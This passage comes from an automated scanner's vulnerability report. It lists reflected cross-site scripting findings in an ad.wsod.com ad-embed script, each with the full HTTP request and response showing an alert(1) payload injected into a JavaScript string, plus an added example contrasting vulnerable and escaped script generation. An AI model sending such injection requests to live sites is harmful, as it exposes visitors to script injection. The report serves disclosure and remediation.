Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:05 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843025:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:05 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
...[SNIP]...

5.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9758b'-alert(1)-'3377d1f28de was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:01 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843021:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:01 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               re
...[SNIP]...

5.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8f8'-alert(1)-'9db56fcbc1b was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:19 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843039:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:19 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       docume
...[SNIP]...
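
The following is an added example, not code from the XSS.CX report or from the ad.wsod.com script. It rebuilds the wsodOOBClick() click tracker shown above in two forms: the vulnerable one that concatenates request parameters straight into a single-quoted JavaScript string, and a hardened one that emits the URL as a properly escaped string literal. Both generated scripts are then executed the way a browser would execute the embed script, with a stand-in Image class and a recording alert(). The click URL, parameter names and the AN payload come from the request and response above; buildTrackerVulnerable, buildTrackerSafe, jsStringLiteral, runTracker and FakeImage are this example's own names.

```javascript
// Added example (not from the report or from ad.wsod.com): vulnerable vs. hardened
// generation of the click-tracker script, executed to show the difference.
// The URL and parameter names are from the report; the function names are assumptions.

const CLICK_BASE = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&';

// Vulnerable template: values are interpolated raw, so a ' in any value ends the literal.
function buildTrackerVulnerable(params) {
  const qs = Object.entries(params).map(([k, v]) => `${k}=${v}`).join('&');
  return "var i = new Image();\n" +
         "i.src = '" + CLICK_BASE + qs + "';\n" +
         "return i.src;";
}

// Serialise a value as a JavaScript string literal that is safe to drop into a script.
// JSON.stringify escapes backslash, double quote and control characters; the extra
// replacements cover </script> breakout inside inline scripts and the U+2028/U+2029
// line terminators that JSON allows but pre-ES2019 string literals do not.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened template: URL-encode each name and value so the click URL stays well-formed,
// then emit the whole URL through jsStringLiteral so nothing can leave the string context.
function buildTrackerSafe(params) {
  const qs = Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join('&');
  return "var i = new Image();\n" +
         "i.src = " + jsStringLiteral(CLICK_BASE + qs) + ";\n" +
         "return i.src;";
}

// Execute generated script text in a scope that supplies Image and alert, mirroring the
// browser running a script that a publisher page pulled in with <script src=...>.
function runTracker(code) {
  const alerts = [];
  class FakeImage { constructor() { this.src = ''; } }
  const fn = new Function('Image', 'alert', code);
  const src = fn(FakeImage, (x) => alerts.push(x));
  return { src, alerts };
}

// Constructed input: the report's parameter values, with the scanner's AN payload appended.
const AN_PAYLOAD = "9d8f8'-alert(1)-'9db56fcbc1b";
const PARAMS = {
  PID: '8479898', UIT: 'G', TargetID: '28253488',
  AN: '1797458628' + AN_PAYLOAD, PG: 'INVSRQ',
  ASID: '5a9d1d95557d4344b789fe7d2c3b33e3',
};

function demo(params = PARAMS) {
  return {
    vulnerable: runTracker(buildTrackerVulnerable(params)), // alert(1) fires, src becomes NaN
    safe: runTracker(buildTrackerSafe(params)),             // no alert, payload kept as URL data
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = demo();
  console.log('vulnerable: alerts=%j src=%s', r.vulnerable.alerts, r.vulnerable.src);
  console.log('safe:       alerts=%j src=%s', r.safe.alerts, r.safe.src);
}
```

In the vulnerable run the generated statement evaluates '...AN=17974586289d8f8' - alert(1) - '9db56fcbc1b...', so alert() is called and the tracker URL degenerates to NaN; in the hardened run the same payload is just characters inside the URL. Note that encodeURIComponent alone is not the fix here (it leaves ' ( ) and - untouched): the string-literal escaping is what keeps the value inside the quotes.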

5.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc220'-alert(1)-'63411dca46a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:34 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843054:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('<a href="//ad.wsod.com/click/8bec9b108
...[SNIP]...

5.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88997'-alert(1)-'ecbfd9fe416 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:29 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843049:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:29 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('
...[SNIP]...

5.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df16'-alert(1)-'6ca3ac2d5fd was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:14 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843034:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image35
...[SNIP]...

5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2e9f'-alert(1)-'f8feea60c6c was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:10 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843030:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:10 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       fun
...[SNIP]...

5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baa4c'-alert(1)-'46b9da792e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:38 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843058:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 920

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('<a href="//ad.wsod.com/click/8bec9b1
...[SNIP]...

5.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the PID request parameter, which the scanner lists as &PID (in the request it directly follows the ?!&& sequence of the click URL), is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b088d'-alert(1)-'3a36277583e was appended to the PID value. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:29 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843289:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:29 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
...[SNIP]...

5.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The scanner reports the parameter name as 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click, running from the semicolon-delimited final path segment through ?click; in the request the payload 5eff5'-alert(1)-'4670c7c8014 was appended to the click URL immediately after 93000000000038010.1?!. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:17 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843277:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
